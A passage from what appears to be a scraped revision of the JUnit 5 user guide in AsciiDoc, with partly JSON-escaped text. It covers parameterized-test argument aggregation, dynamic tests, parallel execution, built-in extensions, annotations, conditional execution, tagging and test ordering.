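	void accessesArgumentsByIndex(ArgumentsAccessor accessor) {
		assertEquals("Jane", accessor.getString(0));
		assertEquals("Doe", accessor.getString(1));
		// getInteger(...) converts the third token to an Integer
		assertEquals(Integer.valueOf(1980), accessor.getInteger(2));
	}
}
----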
In addition, type conversion is supported as discussed in\n<<writing-tests-parameterized-tests-argument-conversion-implicit>>.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAccessor_example]\n----\n\n_An instance of `ArgumentsAccessor` is automatically injected into any parameter of type\n`ArgumentsAccessor`._\n\n[[writing-tests-parameterized-tests-argument-aggregation-custom]]\n===== Custom Aggregators\n\nApart from direct access to a `@ParameterizedTest` method's arguments using an\n`ArgumentsAccessor`, JUnit Jupiter also supports the usage of custom, reusable\n_aggregators_.\n\nTo use a custom aggregator, implement the `{ArgumentsAggregator}` interface and register\nit via the `@AggregateWith` annotation on a compatible parameter in the\n`@ParameterizedTest` method. The result of the aggregation will then be provided as an\nargument for the corresponding parameter when the parameterized test is invoked. Note\nthat an implementation of `ArgumentsAggregator` must be declared as either a top-level\nclass or as a `static` nested class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAggregator_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAggregator_example_PersonAggregator]\n----\n\nIf you find yourself repeatedly declaring `@AggregateWith(MyTypeAggregator.class)` for\nmultiple parameterized test methods across your codebase, you may wish to create a custom\n_composed annotation_ such as `@CsvToMyType` that is meta-annotated with\n`@AggregateWith(MyTypeAggregator.class)`. The following example demonstrates this in\naction with a custom `@CsvToPerson` annotation.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAggregator_with_custom_annotation_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsAggregator_with_custom_annotation_example_CsvToPerson]\n----\n\n\n[[writing-tests-parameterized-tests-display-names]]\n==== Customizing Display Names\n\nBy default, the display name of a parameterized test invocation contains the invocation\nindex and the `String` representation of all arguments for that specific invocation.\nHowever, you can customize invocation display names via the `name` attribute of the\n`@ParameterizedTest` annotation like in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=custom_display_names]\n----\n\nWhen executing the above method using the `ConsoleLauncher` you will see output similar to the following.\n\n....\nDisplay name of container \u2714\n\u251c\u2500 1 ==> first='foo', second=1 \u2714\n\u251c\u2500 2 ==> first='bar', second=2 \u2714\n\u2514\u2500 3 ==> first='baz, qux', second=3 \u2714\n....\n\nThe following placeholders are supported within custom display names.\n\n[cols=\"20,80\"]\n|===\n| Placeholder | Description\n\n| `{index}` | the current invocation index (1-based)\n| `{arguments}` | the complete, comma-separated arguments list\n| `{0}`, `{1}`, ... | an individual argument\n|===\n\n\n[[writing-tests-parameterized-tests-lifecycle-interop]]\n==== Lifecycle and Interoperability\n\nEach invocation of a parameterized test has the same lifecycle as a regular `@Test`\nmethod. 
For example, `@BeforeEach` methods will be executed before each invocation.\nSimilar to <<writing-tests-dynamic-tests>>, invocations will appear one by one in the\ntest tree of an IDE. You may at will mix regular `@Test` methods and `@ParameterizedTest`\nmethods within the same test class.\n\nYou may use `ParameterResolver` extensions with `@ParameterizedTest` methods. However,\nmethod parameters that are resolved by argument sources need to come first in the\nargument list. Since a test class may contain regular tests as well as parameterized\ntests with different parameter lists, values from argument sources are not resolved for\nlifecycle methods (e.g. `@BeforeEach`) and test class constructors.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ParameterResolver_example]\n----\n\n\n[[writing-tests-test-templates]]\n=== Test Templates\n\nA `{TestTemplate}` method is not a regular test case but rather a template for test\ncases. As such, it is designed to be invoked multiple times depending on the number of\ninvocation contexts returned by the registered providers. Thus, it must be used in\nconjunction with a registered `{TestTemplateInvocationContextProvider}` extension. Each\ninvocation of a test template method behaves like the execution of a regular `@Test`\nmethod with full support for the same lifecycle callbacks and extensions. Please refer to\n<<extensions-test-templates>> for usage examples.\n\n\n[[writing-tests-dynamic-tests]]\n=== Dynamic Tests\n\nThe standard `@Test` annotation in JUnit Jupiter described in\n<<writing-tests-annotations>> is very similar to the `@Test` annotation in JUnit 4. Both\ndescribe methods that implement test cases. These test cases are static in the sense that\nthey are fully specified at compile time, and their behavior cannot be changed by\nanything happening at runtime. _Assumptions provide a basic form of dynamic behavior but\nare intentionally rather limited in their expressiveness._\n\nIn addition to these standard tests a completely new kind of test programming model has\nbeen introduced in JUnit Jupiter. This new kind of test is a _dynamic test_ which is\ngenerated at runtime by a factory method that is annotated with `@TestFactory`.\n\nIn contrast to `@Test` methods, a `@TestFactory` method is not itself a test case but\nrather a factory for test cases. Thus, a dynamic test is the product of a factory.\nTechnically speaking, a `@TestFactory` method must return a single `DynamicNode` or a\n`Stream`, `Collection`, `Iterable`, `Iterator`, or array of `DynamicNode` instances.\nInstantiable subclasses of `DynamicNode` are `DynamicContainer` and `DynamicTest`.\n`DynamicContainer` instances are composed of a _display name_ and a list of dynamic child\nnodes, enabling the creation of arbitrarily nested hierarchies of dynamic nodes.\n`DynamicTest` instances will be executed lazily, enabling dynamic and even\nnon-deterministic generation of test cases.\n\nAny `Stream` returned by a `@TestFactory` will be properly closed by calling\n`stream.close()`, making it safe to use a resource such as `Files.lines()`.\n\nAs with `@Test` methods, `@TestFactory` methods must not be `private` or `static` and may\noptionally declare parameters to be resolved by `ParameterResolvers`.\n\nA `DynamicTest` is a test case generated at runtime. It is composed of a _display name_\nand an `Executable`. 
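For example, the following minimal sketch (hypothetical names, not from the demo
sources) generates one dynamic test per input word:

[source,java,indent=0]
----
import java.util.stream.Stream;

import org.junit.jupiter.api.DynamicTest;
import org.junit.jupiter.api.TestFactory;

import static org.junit.jupiter.api.Assertions.assertTrue;
import static org.junit.jupiter.api.DynamicTest.dynamicTest;

class DynamicTestSketch {

	@TestFactory
	Stream<DynamicTest> palindromeTests() {
		// each element pairs a display name with an Executable (here a lambda)
		return Stream.of("racecar", "radar")
				.map(word -> dynamicTest("isPalindrome: " + word,
					() -> assertTrue(isPalindrome(word))));
	}

	private static boolean isPalindrome(String candidate) {
		return new StringBuilder(candidate).reverse().toString().equals(candidate);
	}
}
----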
`Executable` is a `@FunctionalInterface` which means that the\nimplementations of dynamic tests can be provided as _lambda expressions_ or _method\nreferences_.\n\n.Dynamic Test Lifecycle\nWARNING: The execution lifecycle of a dynamic test is quite different than it is for a\nstandard `@Test` case. Specifically, there are no lifecycle callbacks for individual\ndynamic tests. This means that `@BeforeEach` and `@AfterEach` methods and their\ncorresponding extension callbacks are executed for the `@TestFactory` method but not for\neach _dynamic test_. In other words, if you access fields from the test instance within a\nlambda expression for a dynamic test, those fields will not be reset by callback methods\nor extensions between the execution of individual dynamic tests generated by the same\n`@TestFactory` method.\n\nAs of JUnit Jupiter {jupiter-version}, dynamic tests must always be created by factory\nmethods; however, this might be complemented by a registration facility in a later\nrelease.\n\nWARNING: Dynamic tests are currently an _experimental_ feature. Consult the table in\n<<api-evolution-experimental-apis>> for details.\n\n[[writing-tests-dynamic-tests-examples]]\n==== Dynamic Test Examples\n\nThe following `DynamicTestsDemo` class demonstrates several examples of test factories\nand dynamic tests.\n\nThe first method returns an invalid return type. Since an invalid return type cannot be\ndetected at compile time, a `JUnitException` is thrown when it is detected at runtime.\n\nThe next five methods are very simple examples that demonstrate the generation of a\n`Collection`, `Iterable`, `Iterator`, or `Stream` of `DynamicTest` instances. Most of\nthese examples do not really exhibit dynamic behavior but merely demonstrate the\nsupported return types in principle. However, `dynamicTestsFromStream()` and\n`dynamicTestsFromIntStream()` demonstrate how easy it is to generate dynamic tests for a\ngiven set of strings or a range of input numbers.\n\nThe next method is truly dynamic in nature. `generateRandomNumberOfTests()` implements an\n`Iterator` that generates random numbers, a display name generator, and a test executor\nand then provides all three to `DynamicTest.stream()`. Although the non-deterministic\nbehavior of `generateRandomNumberOfTests()` is of course in conflict with test\nrepeatability and should thus be used with care, it serves to demonstrate the\nexpressiveness and power of dynamic tests.\n\nThe last method generates a nested hierarchy of dynamic tests utilizing\n`DynamicContainer`.\n\n[source,java]\n----\ninclude::{testDir}\/example\/DynamicTestsDemo.java[tags=user_guide]\n----\n\n\n[[writing-tests-parallel-execution]]\n=== Parallel Execution\n\n.Parallel test execution is an experimental feature\nWARNING: You're invited to give it a try and provide feedback to the JUnit team so they\ncan improve and eventually <<api-evolution, promote>> this feature.\n\nBy default, JUnit Jupiter tests are run sequentially in a single thread. Running tests in\nparallel -- for example, to speed up execution -- is available as an opt-in feature since\nversion 5.3. To enable parallel execution, set the\n`junit.jupiter.execution.parallel.enabled` configuration parameter to `true` -- for\nexample, in `junit-platform.properties` (see <<running-tests-config-params>> for other\noptions).\n\nPlease note that enabling this property is only the first step required to execute tests\nin parallel. If enabled, test classes and methods will still be executed sequentially by\ndefault. 
Whether or not a node in the test tree is executed concurrently is controlled by\nits execution mode. The following two modes are available.\n\n`SAME_THREAD`::\n Force execution in the same thread used by the parent. For example, when used on a test\n method, the test method will be executed in the same thread as any `@BeforeAll` or\n `@AfterAll` methods of the containing test class.\n\n`CONCURRENT`::\n Execute concurrently unless a resource lock forces execution in the same thread.\n\nBy default, nodes in the test tree use the `SAME_THREAD` execution mode. You can change\nthe default by setting the `junit.jupiter.execution.parallel.mode.default` configuration\nparameter. Alternatively, you can use the `{Execution}` annotation to change the\nexecution mode for the annotated element and its subelements (if any) which allows you to\nactivate parallel execution for individual test classes, one by one.\n\n[source,properties]\n.Configuration parameters to execute all tests in parallel\n----\njunit.jupiter.execution.parallel.enabled = true\njunit.jupiter.execution.parallel.mode.default = concurrent\n----\n\nThe default execution mode is applied to all nodes of the test tree with a few notable\nexceptions, namely test classes that use the `Lifecycle.PER_CLASS` mode or a\n`{MethodOrderer}` (except for `{Random}`). In the former case, test authors have to\nensure that the test class is thread-safe; in the latter, concurrent execution might\nconflict with the configured execution order. Thus, in both cases, test methods in such\ntest classes are only executed concurrently if the `@Execution(CONCURRENT)` annotation is\npresent on the test class or method.\n\nAll nodes of the test tree that are configured with the `CONCURRENT` execution mode will\nbe executed fully in parallel according to the provided\n<<writing-tests-parallel-execution-config, configuration>> while observing the\ndeclarative <<writing-tests-parallel-execution-synchronization, synchronization>>\nmechanism. Please note that <<running-tests-capturing-output>> needs to be enabled\nseparately.\n\n[[writing-tests-parallel-execution-config]]\n==== Configuration\n\nProperties such as the desired parallelism and the maximum pool size can be configured\nusing a `{ParallelExecutionConfigurationStrategy}`. The JUnit Platform provides two\nimplementations out of the box: `dynamic` and `fixed`. Alternatively, you may implement a\n`custom` strategy.\n\nTo select a strategy, set the `junit.jupiter.execution.parallel.config.strategy`\nconfiguration parameter to one of the following options.\n\n`dynamic`::\n Computes the desired parallelism based on the number of available processors\/cores\n multiplied by the `junit.jupiter.execution.parallel.config.dynamic.factor`\n configuration parameter (defaults to `1`).\n\n`fixed`::\n Uses the mandatory `junit.jupiter.execution.parallel.config.fixed.parallelism`\n configuration parameter as the desired parallelism.\n\n`custom`::\n Allows you to specify a custom `{ParallelExecutionConfigurationStrategy}`\n implementation via the mandatory `junit.jupiter.execution.parallel.config.custom.class`\n configuration parameter to determine the desired configuration.\n\nIf no configuration strategy is set, JUnit Jupiter uses the `dynamic` configuration\nstrategy with a factor of `1`. 
Consequently, the desired parallelism will be equal to the\nnumber of available processors\/cores.\n\n.Parallelism does not imply maximum number of concurrent threads\nNOTE: JUnit Jupiter does not guarantee that the number of concurrently executing tests\nwill not exceed the configured parallelism. For example, when using one of the\nsynchronization mechanisms described in the next section, the `ForkJoinPool` that is used\nbehind the scenes may spawn additional threads to ensure execution continues with\nsufficient parallelism. Thus, if you require such guarantees in a test class, please use\nyour own means of controlling concurrency.\n\n[[writing-tests-parallel-execution-synchronization]]\n==== Synchronization\n\nIn addition to controlling the execution mode using the `{Execution}` annotation, JUnit\nJupiter provides another annotation-based declarative synchronization mechanism. The\n`{ResourceLock}` annotation allows you to declare that a test class or method uses a\nspecific shared resource that requires synchronized access to ensure reliable test\nexecution. The shared resource is identified by a unique name which is a `String`. The\nname can be user-defined or one of the predefined constants in `{Resources}`:\n`SYSTEM_PROPERTIES`, `SYSTEM_OUT`, `SYSTEM_ERR`, `LOCALE`, or `TIME_ZONE`.\n\nIf the tests in the following example were run in parallel _without_ the use of\n{ResourceLock}, they would be _flaky_. Sometimes they would pass, and at other times they\nwould fail due to the inherent race condition of writing and then reading the same JVM\nSystem Property.\n\nWhen access to shared resources is declared using the {ResourceLock} annotation, the\nJUnit Jupiter engine uses this information to ensure that no conflicting tests are run in\nparallel.\n\nIn addition to the `String` that uniquely identifies the shared resource, you may specify\nan access mode. Two tests that require `READ` access to a shared resource may run in\nparallel with each other but not while any other test that requires `READ_WRITE` access\nto the same shared resource is running.\n\n[source,java]\n----\ninclude::{testDir}\/example\/SharedResourcesDemo.java[tags=user_guide]\n----\n\n\n[[writing-tests-built-in-extensions]]\n=== Built-in Extensions\n\nWhile the JUnit team encourages reusable extensions to be packaged and maintained in\nseparate libraries, the JUnit Jupiter API artifact includes a few user-facing extension\nimplementations that are considered so generally useful that users shouldn't have to add\nanother dependency.\n\n[[writing-tests-built-in-extensions-TempDirectory]]\n==== The TempDirectory Extension\n\nThe `TempDirectory` extension can be used to create and clean up a temporary directory\nfor an individual test or all tests in a test class. To use it, register the extension\nand add a parameter of type `java.nio.file.Path` annotated with `@TempDir` to your test\nmethod, lifecycle method, or test class constructor.\n\nFor example, the following test registers the extension for a single test method, creates\nand writes to a file in the temporary directory, and checks its content.\n\n[source,java,indent=0]\n.A test method that requires a temporary directory\n----\ninclude::{testDir}\/example\/TempDirectoryDemo.java[tags=user_guide]\n----\n\nIn addition to the default file system for the local operating system, the\n`TempDirectory` extension can also be used with any `FileSystem` implementation -- for\nexample, https:\/\/github.com\/google\/jimfs[Jimfs]. 
In order to use a custom file system,\nregister the extension _programmatically_ via `@RegisterExtension` and supply a provider\nof a custom parent directory of type `Path`. The following example uses the Jimfs\n`FileSystem` and passes a custom `tmp` parent directory to the\n`createInCustomDirectory()` static factory method.\n\n[source,java]\n.A test class that configures the TempDirectory extension to use a custom file system\n----\ninclude::{testDir}\/example\/TempDirectoryWithCustomFileSystemDemo.java[tags=user_guide]\n----\n","old_contents":"[[writing-tests]]\n== Writing Tests\n\n[source,java,indent=0]\n.A first test case\n----\ninclude::{testDir}\/example\/MyFirstJUnitJupiterTests.java[tags=user_guide]\n----\n\n[[writing-tests-annotations]]\n=== Annotations\n\nJUnit Jupiter supports the following annotations for configuring tests and extending the\nframework.\n\nAll core annotations are located in the `{api-package}` package in the `junit-jupiter-api`\nmodule.\n\n[cols=\"20,80\"]\n|===\n| Annotation | Description\n\n| `@Test` | Denotes that a method is a test method. Unlike JUnit 4's `@Test` annotation, this annotation does not declare any attributes, since test extensions in JUnit Jupiter operate based on their own dedicated annotations. Such methods are _inherited_ unless they are _overridden_.\n| `@ParameterizedTest` | Denotes that a method is a <<writing-tests-parameterized-tests, parameterized test>>. Such methods are _inherited_ unless they are _overridden_.\n| `@RepeatedTest` | Denotes that a method is a test template for a <<writing-tests-repeated-tests, repeated test>>. Such methods are _inherited_ unless they are _overridden_.\n| `@TestFactory` | Denotes that a method is a test factory for <<writing-tests-dynamic-tests, dynamic tests>>. Such methods are _inherited_ unless they are _overridden_.\n| `@TestTemplate` | Denotes that a method is a <<writing-tests-test-templates, template for test cases>> designed to be invoked multiple times depending on the number of invocation contexts returned by the registered <<extensions-test-templates, providers>>. Such methods are _inherited_ unless they are _overridden_.\n| `@TestMethodOrder` | Used to configure the <<writing-tests-test-execution-order, test method execution order>> for the annotated test class; similar to JUnit 4's `@FixMethodOrder`. Such annotations are _inherited_.\n| `@TestInstance` | Used to configure the <<writing-tests-test-instance-lifecycle, test instance lifecycle>> for the annotated test class. Such annotations are _inherited_.\n| `@DisplayName` | Declares a custom display name for the test class or test method. Such annotations are not _inherited_.\n| `@DisplayNameGeneration` | Declares a custom display name generator for the test class. Such annotations are _inherited_.\n| `@BeforeEach` | Denotes that the annotated method should be executed _before_ *each* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, or `@TestFactory` method in the current class; analogous to JUnit 4's `@Before`. Such methods are _inherited_ unless they are _overridden_.\n| `@AfterEach` | Denotes that the annotated method should be executed _after_ *each* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, or `@TestFactory` method in the current class; analogous to JUnit 4's `@After`. 
Such methods are _inherited_ unless they are _overridden_.\n| `@BeforeAll` | Denotes that the annotated method should be executed _before_ *all* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, and `@TestFactory` methods in the current class; analogous to JUnit 4's `@BeforeClass`. Such methods are _inherited_ (unless they are _hidden_ or _overridden_) and must be `static` (unless the \"per-class\" <<writing-tests-test-instance-lifecycle, test instance lifecycle>> is used).\n| `@AfterAll` | Denotes that the annotated method should be executed _after_ *all* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, and `@TestFactory` methods in the current class; analogous to JUnit 4's `@AfterClass`. Such methods are _inherited_ (unless they are _hidden_ or _overridden_) and must be `static` (unless the \"per-class\" <<writing-tests-test-instance-lifecycle, test instance lifecycle>> is used).\n| `@Nested` | Denotes that the annotated class is a nested, non-static test class. `@BeforeAll` and `@AfterAll` methods cannot be used directly in a `@Nested` test class unless the \"per-class\" <<writing-tests-test-instance-lifecycle, test instance lifecycle>> is used. Such annotations are not _inherited_.\n| `@Tag` | Used to declare _tags_ for filtering tests, either at the class or method level; analogous to test groups in TestNG or Categories in JUnit 4. Such annotations are _inherited_ at the class level but not at the method level.\n| `@Disabled` | Used to _disable_ a test class or test method; analogous to JUnit 4's `@Ignore`. Such annotations are not _inherited_.\n| `@ExtendWith` | Used to register custom <<extensions,extensions>>. Such annotations are _inherited_.\n|===\n\nMethods annotated with `@Test`, `@TestTemplate`, `@RepeatedTest`, `@BeforeAll`,\n`@AfterAll`, `@BeforeEach`, or `@AfterEach` annotations must not return a value.\n\nWARNING: Some annotations may currently be _experimental_. Consult the table in\n<<api-evolution-experimental-apis>> for details.\n\n[[writing-tests-meta-annotations]]\n==== Meta-Annotations and Composed Annotations\n\nJUnit Jupiter annotations can be used as _meta-annotations_. That means that you can\ndefine your own _composed annotation_ that will automatically _inherit_ the semantics of\nits meta-annotations.\n\nFor example, instead of copying and pasting `@Tag(\"fast\")` throughout your code base (see\n<<writing-tests-tagging-and-filtering>>), you can create a custom _composed annotation_\nnamed `@Fast` as follows. `@Fast` can then be used as a drop-in replacement for\n`@Tag(\"fast\")`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/Fast.java[tags=user_guide]\n----\n\n[[writing-tests-classes-and-methods]]\n=== Test Classes and Methods\n\nA _test method_ is any instance method that is directly or meta-annotated with `@Test`,\n`@RepeatedTest`, `@ParameterizedTest`, `@TestFactory`, or `@TestTemplate`. 
A _test class_\nis any top level or static member class that contains at least one test method.\n\n[source,java,indent=0]\n.A standard test class\n----\ninclude::{testDir}\/example\/StandardTests.java[tags=user_guide]\n----\n\nNOTE: Test classes and test methods are not required to be `public`, but they must _not_\nbe `private`.\n\n[[writing-tests-display-names]]\n=== Display Names\n\nTest classes and test methods can declare custom display names -- with spaces, special\ncharacters, and even emojis -- that will be displayed by test runners and test reporting.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisplayNameDemo.java[tags=user_guide]\n----\n\n[[writing-tests-display-name-generator]]\n==== Display Name Generators\n\nJUnit Jupiter supports custom display name generators that can be configured via the\n`@DisplayNameGeneration` annotation. Values provided via `@DisplayName` annotations\nalways take precedence over display names generated by a `DisplayNameGenerator`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisplayNameGeneratorDemo.java[tags=user_guide]\n----\n\n```\n+-- DisplayNameGeneratorDemo [OK]\n +-- A year is not supported [OK]\n | +-- A negative value for year is not supported by the leap year computation. [OK]\n | | +-- For example, year -1 is not supported. [OK]\n | | '-- For example, year -4 is not supported. [OK]\n | '-- if it is zero() [OK]\n '-- A year is a leap year... [OK]\n +-- A year is a leap year if it is divisible by 4 but not by 100. [OK]\n '-- A year is a leap year if it is one of the following years. [OK]\n +-- Year 2016 is a leap year. [OK]\n +-- Year 2020 is a leap year. [OK]\n '-- Year 2048 is a leap year. [OK]\n```\n\n[[writing-tests-assertions]]\n=== Assertions\n\nJUnit Jupiter comes with many of the assertion methods that JUnit 4 has and adds a few\nthat lend themselves well to being used with Java 8 lambdas. All JUnit Jupiter assertions\nare `static` methods in the `{Assertions}` class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/AssertionsDemo.java[tags=user_guide]\n----\n\nJUnit Jupiter also comes with a few assertion methods that lend themselves well to being\nused in https:\/\/kotlinlang.org\/[Kotlin]. All JUnit Jupiter Kotlin assertions are top-level\nfunctions in the `org.junit.jupiter.api` package.\n\n\/\/ TODO: Change to using kotlin language highlighting after switch to rouge syntax highlighter\n[source,groovy,indent=0]\n----\ninclude::{kotlinTestDir}\/example\/AssertionsKotlinDemo.kt[tags=user_guide]\n----\n\n[[writing-tests-assertions-third-party]]\n==== Third-party Assertion Libraries\n\nEven though the assertion facilities provided by JUnit Jupiter are sufficient for many\ntesting scenarios, there are times when more power and additional functionality such as\n_matchers_ are desired or required. In such cases, the JUnit team recommends the use of\nthird-party assertion libraries such as {AssertJ}, {Hamcrest}, {Truth}, etc. Developers\nare therefore free to use the assertion library of their choice.\n\nFor example, the combination of _matchers_ and a fluent API can be used to make\nassertions more descriptive and readable. However, JUnit Jupiter's `{Assertions}` class\ndoes not provide an\nhttp:\/\/junit.org\/junit4\/javadoc\/latest\/org\/junit\/Assert.html#assertThat[`assertThat()`]\nmethod like the one found in JUnit 4's `org.junit.Assert` class which accepts a Hamcrest\nhttp:\/\/junit.org\/junit4\/javadoc\/latest\/org\/hamcrest\/Matcher.html[`Matcher`]. 
Instead,\ndevelopers are encouraged to use the built-in support for matchers provided by third-party\nassertion libraries.\n\nThe following example demonstrates how to use the `assertThat()` support from Hamcrest in\na JUnit Jupiter test. As long as the Hamcrest library has been added to the classpath,\nyou can statically import methods such as `assertThat()`, `is()`, and `equalTo()` and\nthen use them in tests like in the `assertWithHamcrestMatcher()` method below.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/HamcrestAssertionDemo.java[tags=user_guide]\n----\n\nNaturally, legacy tests based on the JUnit 4 programming model can continue using\n`org.junit.Assert#assertThat`.\n\n[[writing-tests-assumptions]]\n=== Assumptions\n\nJUnit Jupiter comes with a subset of the assumption methods that JUnit 4 provides and\nadds a few that lend themselves well to being used with Java 8 lambda expressions and\nmethod references. All JUnit Jupiter assumptions are static methods in the\n`{Assumptions}` class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/AssumptionsDemo.java[tags=user_guide]\n----\n\nNOTE: As of JUnit Jupiter 5.4, it is also possible to use methods from JUnit 4's\n`org.junit.Assume` class for assumptions. Specifically, JUnit Jupiter supports JUnit 4's\n`AssumptionViolatedException` to signal that a test should be aborted instead of marked\nas a failure.\n\n[[writing-tests-disabling]]\n=== Disabling Tests\n\nEntire test classes or individual test methods may be _disabled_ via the `{Disabled}`\nannotation, via one of the annotations discussed in\n<<writing-tests-conditional-execution>>, or via a custom <<extensions-conditions,\n`ExecutionCondition`>>.\n\nHere's a `@Disabled` test class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisabledClassDemo.java[tags=user_guide]\n----\n\nAnd here's a test class that contains a `@Disabled` test method.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisabledTestsDemo.java[tags=user_guide]\n----\n\nNOTE: `@Disabled` may be declared without providing a _reason_; however, the JUnit team\nrecommends that developers provide a short explanation for why a test class or test\nmethod has been disabled. Consequently, the above examples both show the use of a reason\n-- for example, `@Disabled(\"Disabled until bug #42 has been resolved\")`. Some development\nteams even require the presence of issue tracking numbers in the _reason_ for automated\ntraceability, etc.\n\n[[writing-tests-conditional-execution]]\n=== Conditional Test Execution\n\nThe <<extensions-conditions, `ExecutionCondition`>> extension API in JUnit Jupiter allows\ndevelopers to either _enable_ or _disable_ a container or test based on certain\nconditions _programmatically_. The simplest example of such a condition is the built-in\n`{DisabledCondition}` which supports the `{Disabled}` annotation (see\n<<writing-tests-disabling>>). In addition to `@Disabled`, JUnit Jupiter also supports\nseveral other annotation-based conditions in the `org.junit.jupiter.api.condition`\npackage that allow developers to enable or disable containers and tests _declaratively_.\nSee the following sections for details.\n\n[TIP]\n.Composed Annotations\n====\nNote that any of the _conditional_ annotations listed in the following sections may also\nbe used as a meta-annotation in order to create a custom _composed annotation_. 
For\nexample, the `@TestOnMac` annotation in the\n<<writing-tests-conditional-execution-os-demo, @EnabledOnOs demo>> shows how you can\ncombine `@Test` and `@EnabledOnOs` in a single, reusable annotation.\n====\n\n[WARNING]\n====\nEach of the _conditional_ annotations listed in the following sections can only be\ndeclared once on a given test interface, test class, or test method. If a conditional\nannotation is directly present, indirectly present, or meta-present multiple times on a\ngiven element, only the first such annotation discovered by JUnit will be used; any\nadditional declarations will be silently ignored. Note, however, that each conditional\nannotation may be used in conjunction with other conditional annotations in the\n`org.junit.jupiter.api.condition` package.\n====\n\n[[writing-tests-conditional-execution-os]]\n==== Operating System Conditions\n\nA container or test may be enabled or disabled on a particular operating system via the\n`{EnabledOnOs}` and `{DisabledOnOs}` annotations.\n\n[[writing-tests-conditional-execution-os-demo]]\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_os]\n----\n\n[[writing-tests-conditional-execution-jre]]\n==== Java Runtime Environment Conditions\n\nA container or test may be enabled or disabled on a particular version of the Java\nRuntime Environment (JRE) via the `{EnabledOnJre}` and `{DisabledOnJre}` annotations.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_jre]\n----\n\n[[writing-tests-conditional-execution-system-properties]]\n==== System Property Conditions\n\nA container or test may be enabled or disabled based on the value of the `named` JVM\nsystem property via the `{EnabledIfSystemProperty}` and `{DisabledIfSystemProperty}`\nannotations. The value supplied via the `matches` attribute will be interpreted as a\nregular expression.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_system_property]\n----\n\n[[writing-tests-conditional-execution-environment-variables]]\n==== Environment Variable Conditions\n\nA container or test may be enabled or disabled based on the value of the `named`\nenvironment variable from the underlying operating system via the\n`{EnabledIfEnvironmentVariable}` and `{DisabledIfEnvironmentVariable}` annotations. The\nvalue supplied via the `matches` attribute will be interpreted as a regular expression.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_environment_variable]\n----\n\n[[writing-tests-conditional-execution-scripts]]\n==== Script-based Conditions\n\nJUnit Jupiter provides the ability to either _enable_ or _disable_ a container or test\ndepending on the evaluation of a script configured via the `{EnabledIf}` or\n`{DisabledIf}` annotation. Scripts can be written in JavaScript, Groovy, or any other\nscripting language for which there is support for the Java Scripting API, defined by JSR\n223.\n\nWARNING: Conditional test execution via `{EnabledIf}` and `{DisabledIf}` is currently an\n_experimental_ feature. 
Consult the table in <<api-evolution-experimental-apis>> for
details.

TIP: If the logic of your script depends only on the current operating system, the
current Java Runtime Environment version, a particular JVM system property, or a
particular environment variable, you should consider using one of the built-in
annotations dedicated to that purpose. See the previous sections of this chapter for
further details.

NOTE: If you find yourself using the same script-based condition many times, consider
writing a dedicated <<extensions-conditions, ExecutionCondition>> extension in order to
implement the condition in a faster, type-safe, and more maintainable manner.

[source,java,indent=0]
----
include::{testDir}/example/ConditionalTestExecutionDemo.java[tags=user_guide_scripts]
----

[[writing-tests-conditional-execution-scripts-bindings]]
===== Script Bindings

The following names are bound to each script context and therefore usable within the
script. An _accessor_ provides access to a map-like structure via a simple `String
get(String name)` method.

[cols="25,25,75"]
|===
| Name | Type | Description

| `systemEnvironment` | _accessor_ | Operating system environment variable accessor.
| `systemProperty` | _accessor_ | JVM system property accessor.
| `junitConfigurationParameter` | _accessor_ | Configuration parameter accessor.
| `junitDisplayName` | `String` | Display name of the test or container.
| `junitTags` | `Set<String>` | All tags assigned to the test or container.
| `junitUniqueId` | `String` | Unique ID of the test or container.
|===


[[writing-tests-tagging-and-filtering]]
=== Tagging and Filtering

Test classes and methods can be tagged via the `@Tag` annotation. Those tags can later be
used to filter <<running-tests,test discovery and execution>>.

==== Syntax Rules for Tags

* A tag must not be `null` or _blank_.
* A _trimmed_ tag must not contain whitespace.
* A _trimmed_ tag must not contain ISO control characters.
* A _trimmed_ tag must not contain any of the following _reserved characters_.
 - `,`: _comma_
 - `(`: _left parenthesis_
 - `)`: _right parenthesis_
 - `&`: _ampersand_
 - `|`: _vertical bar_
 - `!`: _exclamation point_

NOTE: In the above context, "trimmed" means that leading and trailing whitespace
characters have been removed.

[source,java,indent=0]
----
include::{testDir}/example/TaggingDemo.java[tags=user_guide]
----

[[writing-tests-test-execution-order]]
=== Test Execution Order

By default, test methods will be ordered using an algorithm that is deterministic but
intentionally nonobvious. This ensures that subsequent runs of a test suite execute
test methods in the same order, thereby allowing for repeatable builds.

NOTE: In this context, a _test method_ is any instance method that is directly or
meta-annotated with `@Test`, `@RepeatedTest`, `@ParameterizedTest`, `@TestFactory`, or
`@TestTemplate`.

Although true _unit tests_ typically should not rely on the order in which they are
executed, there are times when it is necessary to enforce a specific test method
execution order -- for example, when writing _integration tests_ or _functional tests_
